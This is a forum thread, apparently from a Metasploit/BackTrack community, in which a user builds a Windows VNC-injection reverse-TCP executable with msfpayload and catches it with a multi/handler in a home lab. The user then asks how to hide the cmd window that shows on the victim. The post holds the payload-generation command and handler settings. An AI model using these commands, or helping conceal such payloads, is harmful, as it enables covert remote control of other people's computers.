We now have like 20 threads going on meterpreter.....
Some Questions about msfpayload/Meterpreter
Good evening, guys
At first i want to say great thanks for the genius support in this forum.
Friendly and professional answers aren't often.
The last time i play a litte bit around with the combination of msfpayload and the vncinject payload.
My envireoment :
PC1: 192.168.0.2 ( XP or vista ) ( victim )
PC2: 192.168.0.3 ( Backtrack.... sure )
I create an exefile with ./msfpayload /windows/vncinject/reverse_tcp LHOST=192.168.0.3 LPORT=5500 R | -c 2 -t exe -o test.exe
At backtrack ic start the handler :
> use exploits/multi/halndler
> set Payload /windows/vncinject/reverse_tcp
> set LHOST 192.168.0.3
> set LPORT 5500
> exploit
when the victim starts the exe, the vncdll will inject and at backtrack i get my fenster to watch.
But now comes this bad blue cmdshell at the victim...
Ich there any possibilitys to avoid this or catch the process and hide it ?
Is there any other payload option i have to use to avoid this ?
Another question is, if it is possible not to take the metasploit handler in backtrack to listen to the connection, but the relvncviewer or the Ultravncviewer in listen mode ?
Big thanks to all who had an idea.
Greetz
Cyclone
We now have like 20 threads going on meterpreter.....
Hi Purehate
I've written these post but i can'find an answer for the questions, examply if it is possible to use Ultravnc in listenmode. i've tried to realize this aber wenn the payload trys to connect to the ultraVNC(listen) nothing happen, insteat the the Listener is hang up. With the RealVNC listener only nothin happens.
Perhaps i use the wrong payload parameters...
I will try to use the searchfunction one more time, but the treats i'read doesent
handle with this problem.
Greetz
Cyclone
Make sure you understand how firewalls works/functions with bind_tcp and reverse_tcp. (keyword: dmz)
Now a good advice after reading is to check it locally and then make sure it works.
Don't install any Anti-virus on your local machine nor firewall. Just try it without and
check how it works. It's really not that hard once you get to learn about it.
There's plenty Metasploit and Meterpreter documentation and Docs on the internet, trust me
[quote][I]I realized, that I had fallen down from the top of the mountain into a deep, terrifying and dark hole, just to find out that another mountain in front of me, much greater than the previous, was the next step in life. I began to wander uphill on the next mountain of life while I knew it would be much harder than the previous mountain. [/I]- MaXe[/quote]
What is a "bad blue cmdshell..." ?
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
Posting Permissions